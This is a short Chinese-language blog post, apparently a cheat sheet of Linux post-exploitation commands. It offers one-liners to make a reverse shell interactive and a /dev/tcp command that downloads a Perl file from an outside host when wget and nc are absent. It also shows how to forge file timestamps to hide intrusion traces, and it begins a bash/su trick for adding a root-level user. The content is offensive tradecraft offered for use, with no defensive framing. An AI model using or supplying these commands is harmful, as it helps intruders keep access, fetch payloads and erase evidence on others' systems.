Commands 搜集(持续更新)

2018 年 4 月 28 日 黑白之道


Linux

Linux反弹shell后,方便的交互:

1
python -c 'import pty; pty.spawn("/bin/bash")'

无python时:

1
expect -c 'spawn bash;interact'

无wget nc等下载工具时下载文件

1
exec 5<>/dev/tcp/sec-lab.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl

修改上传文件时间戳(掩盖入侵痕迹)

1
touch -r 老文件时间戳 新文件时间戳

利用BASH提权

这个要求管理员有su的习惯,我们可以通过它来添加一个id=0的用户